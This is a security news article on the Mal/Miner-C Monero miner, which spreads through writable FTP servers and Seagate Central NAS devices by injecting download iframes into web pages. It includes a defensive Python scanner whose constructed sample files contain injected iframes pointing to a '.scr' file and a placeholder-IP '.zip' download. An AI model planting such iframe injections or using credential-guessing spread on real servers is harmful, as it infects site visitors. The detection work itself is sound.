Sophos has conducted a detailed analysis of a piece of malware designed to abuse infected computers for cryptocurrency mining and discovered that the threat leverages network-attached storage (NAS) devices to spread.
The malware, detected by the security firm as Mal/Miner-C, leverages infected computers to mine Monero (XMR), an open source privacy-focused cryptocurrency which, unlike Bitcoin, can still be mined using regular computers. The threat is written in NSIS (Nullsoft Scriptable Install System), a scripting language used for creating Windows installers.
These types of Trojans are not unheard of. Last month, antivirus company Dr. Web reported spotting a Go-based Monero miner designed to target Linux systems.
What makes Mal/Miner-C interesting is the fact that it abuses FTP servers in an effort to spread to as many computers as possible. Some instances of the malware include a component, called tftp.exe, which randomly generates IP addresses and attempts to connect to them using a predefined list of usernames and passwords.
If it establishes a successful connection to an FTP service, the malware copies itself to that server and modifies the .html and .php files stored on it. The targeted web files are injected with code that generates an iframe referencing the malware. When users visit these infected webpages, they are presented with a “save file” dialog that serves the malicious files. If victims download and open these files, their systems will become infected with Mal/Miner-C.
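The injection step above gives defenders a concrete thing to look for: web files on an FTP-exposed server that suddenly contain an iframe whose target is a downloadable payload rather than another page. The following scanner is an added example written for this article, not Sophos's code; the article does not show the exact injected markup, so the heuristic (flag any iframe whose src path ends in an executable or archive extension) and the sample files, names and the 192.0.2.10 address it builds are constructed assumptions.

```python
"""Walk a web root and report <iframe> tags whose src points at a downloadable
payload (.exe, .scr, .zip, ...), the kind of injection described above.
Added example, not part of the original article. Sample tree is constructed."""
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: a legitimate page rarely frames a file with one of these extensions.
PAYLOAD_EXTENSIONS = {".exe", ".scr", ".zip", ".rar", ".msi", ".bat", ".cmd"}
# File types the article says were modified on infected servers.
WEB_EXTENSIONS = {".html", ".htm", ".php"}


class IframeCollector(HTMLParser):
    """Collect the src attribute of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def suspicious_iframes(html_text):
    """Return iframe src values whose URL path ends in a payload extension."""
    parser = IframeCollector()
    parser.feed(html_text)
    hits = []
    for src in parser.sources:
        path = urlparse(src).path.lower()
        if os.path.splitext(path)[1] in PAYLOAD_EXTENSIONS:
            hits.append(src)
    return hits


def scan_tree(root):
    """Inspect every .html/.htm/.php file under root; return sorted (relpath, src) findings."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if os.path.splitext(fn)[1].lower() not in WEB_EXTENSIONS:
                continue
            full = os.path.join(dirpath, fn)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file; skip rather than abort the scan
            for src in suspicious_iframes(text):
                findings.append((os.path.relpath(full, root), src))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed web root: one clean page, one injected page and one
    injected PHP file in a subfolder. Returns the temporary directory path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "blog"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body><h1>Hello</h1>"
                 "<iframe src='https://www.example.com/embed'></iframe></body></html>")
    with open(os.path.join(root, "about.html"), "w") as fh:
        fh.write("<html><body>About us"
                 "<iframe src='Photo.scr' width='1' height='1' style='display:none'></iframe>"
                 "</body></html>")
    with open(os.path.join(root, "blog", "post.php"), "w") as fh:
        fh.write("<?php echo 'post'; ?>"
                 "<iframe src='http://192.0.2.10/ftp/info.zip'></iframe>")
    return root


if __name__ == "__main__":
    for rel, src in scan_tree(build_sample_tree()):
        print(f"{rel}: iframe -> {src}")
```

Run it against a real document root (or a mirror pulled from the FTP share) and compare the output with a known-good copy; on a server like the one described, the clean index page produces nothing while the two injected files are reported. Pairing the scan with a file-integrity baseline catches the modification itself, not just this one iframe pattern.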
Sophos identified over 1.7 million individual infections in the first half of 2016, but these instances only corresponded to 3,150 unique IP addresses. That is because the malware copies itself to every folder on an infected FTP server.
An Internet scan showed that there are over 200,000 active FTP servers around the world that allow anonymous remote access, and more than 7,200 of them are not properly configured and have write access enabled. Of these, roughly 5,100 have already been infected with Mal/Miner-C.
While the malware has targeted various types of FTP servers, researchers noticed one device that is particularly susceptible to abuse. By default, Seagate’s Central NAS product provides a public folder that cannot be deleted or deactivated. If remote access is enabled on the device, attackers can easily plant the malware files in hopes that they will be executed by users once they are discovered.
While Mal/Miner-C cannot directly run on Seagate Central, the NAS device can be highly useful for spreading the malware, and Sophos believes that most of these systems have already been infected.
After analyzing the wallets used by the cybercriminals to store their profits, researchers determined that they received a total of roughly 58,000 XMR from the MoneroPool mining pool they used. The infected machines were contributing 431,000 hashes per second, which accounted for half of the pool’s total hash rate.
When Attila Marosi, senior threat researcher at Sophos, wrote the report on Mal/Miner-C, Monero was worth less than $2, which meant cybercriminals had earned roughly $86,000. However, the value of Monero spiked this month after a popular dark web marketplace called AlphaBay integrated the cryptocurrency. One unit of the digital currency is currently worth more than $13, which means that the profit made by the cybercriminals is significantly higher.